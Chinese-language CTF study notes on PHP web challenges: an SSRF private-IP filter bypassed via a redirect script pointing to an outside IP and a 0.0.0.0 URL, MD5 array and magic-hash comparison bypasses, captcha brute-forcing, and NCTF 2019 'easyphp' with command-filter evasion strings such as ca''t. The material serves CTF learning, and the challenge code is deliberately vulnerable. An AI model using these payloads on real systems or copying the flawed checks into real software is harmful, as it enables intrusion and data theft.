SSRF
【网页】HTTP错误汇总(404、302、200……)
今天看了到ssrf的题
又理解了ssrf
SSRF(Server-side Request Forge, 服务端请求伪造)
用我自己的理解:
就是fopen 。file_get_contents()、curl()、fsocksopen()均可能造成SSRF漏洞。
这些函数,可以通过远程调用服务器里php代码,并且执行!
最简单的例子:
file_get_contents()可以直接file://为协议读!
|
<?php
error_reporting(0);
highlight_file(__FILE__);
function filter($url) {
$match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url);
if (!$match_result)
{
die('url fomat error');
}
try
{
$url_parse=parse_url($url);
}
catch(Exception $e)
{
die('url fomat error');
return false;
}
$hostname=$url_parse['host'];
$ip=gethostbyname($hostname);
$int_ip=ip2long($ip);
return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
}
$url = $_GET['url'];
if(!filter($url)){
echo file_get_contents($url);
}
?> url fomat error
|
exp:
<?php
echo 1111;
header("location:http://8.131.72.215/1.txt");?>
|
看到一个更猛的payload:
?url=http://0.0.0.0/flag.php
|
签到@
考点:
再进入找回密码页面!!
验证码形同虚设!
直接bp爆破
|
ezphp
考点:
<?php
error_reporting(0);
highlight_file(__file__);
include('flag.php');
$string_1 = $_GET['str1'];
$string_2 = $_GET['str2'];
if($_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['param2'])){
if(is_numeric($string_1)){
$md5_1 = md5($string_1);
$md5_2 = md5($string_2);
if($md5_1 != $md5_2){
$a = strtr($md5_1, 'cxhp', '0123');
$b = strtr($md5_2, 'cxhp', '0123');
if($a == $b){
echo $flag;
}
else {
die('you are close');
}
}
else {
die("md5 is wrong");
}
}
else {
die('str1 not number');
}
}
else {
die('you are wrong!');
}
?>
you are wrong!
|
第一个考点是强比较!!
当传入一个数组时。MD5加密后是NULL 也就绕过第一步!
|
$_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['param2'])
|
第二关:
$a = strtr($md5_1, 'cxhp', '0123');
$b = strtr($md5_2, 'cxhp', '0123');
if($a == $b){
echo $flag;
}
|
要求str1传入数字!且md5加密后是不相等的!但是变换后又相等!
根据这个思路继续做!!!
先看看:php手册!!:
https://www.php.net/manual/zh/function.strtr.php
strtr — 转换指定字符
from to 是一一对应的关系!
c对应0 x对应1 等等!!!!
|
那这就好办了!因为这里是php弱比较!直接早0e的
有一点注意:0e后面只能是数字!不能有字母!不然弱不较不成功!!
0e830400451993494058024219903391 与0e11 true
0e83aa 与0e11 flase
|
QNKCDZO
0e830400451993494058024219903391
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
240610708
0e462097431906509019562988736854
9427417
ce156443c7c7c4c63366466c25317636
2120624
0e85776838554cc1775842c212686416
9427417
ce156443c7c7c4c63366466c25317636
|
你可以用9427417。MD5后ce156443c7c7c4c63366466c25317636。再strtr下变成0e+全数字!弱比较成功!
|
看了看原题!
2019-NCTF web easyphp
|
<?php
error_reporting(0);
highlight_file(__file__);
$string_1 = $_GET['str1'];
$string_2 = $_GET['str2'];
$cmd = $_GET['q_w_q'];
if($_GET['num'] !== '23333' && preg_match('/^23333$/', $_GET['num'])){
echo '1st ok'."<br>";
}
else{
die('23333333');
}
if(is_numeric($string_1)){
$md5_1 = md5($string_1);
$md5_2 = md5($string_2);
if($md5_1 != $md5_2){
$a = strtr($md5_1, 'cxhp', '0123');
$b = strtr($md5_2, 'cxhp', '0123');
if($a == $b){
echo '2nd ok'."<br>";
}
else{
die("can u give me the right str???");
}
}
else{
die("no!!!!!!!!");
}
}
else{
die('is str1 numeric??????');
}
$query = $_SERVER['QUERY_STRING'];
if (strlen($cmd) > 8){
die("too long :(");
}
if( substr_count($query, '_') === 0 && substr_count($query, '%5f') === 0 ){
$arr = explode(' ', $cmd);
if($arr[0] !== 'ls' || $arr[0] !== 'pwd'){
if(substr_count($cmd, 'cat') === 0){
system($cmd);
}
else{
die('ban cat :) ');
}
}
else{
die('bad guy!');
}
}
else{
die('nonono _ is bad');
}
?>
|
第3步绕过命令执行waf
ca/t
ca''t
ca""t
c\a""t /f???
c\a""t *
.当前目录
/根目录!
命令执行关键词绕过
https://blog.csdn.net/qq_45927819/article/details/109671655
|
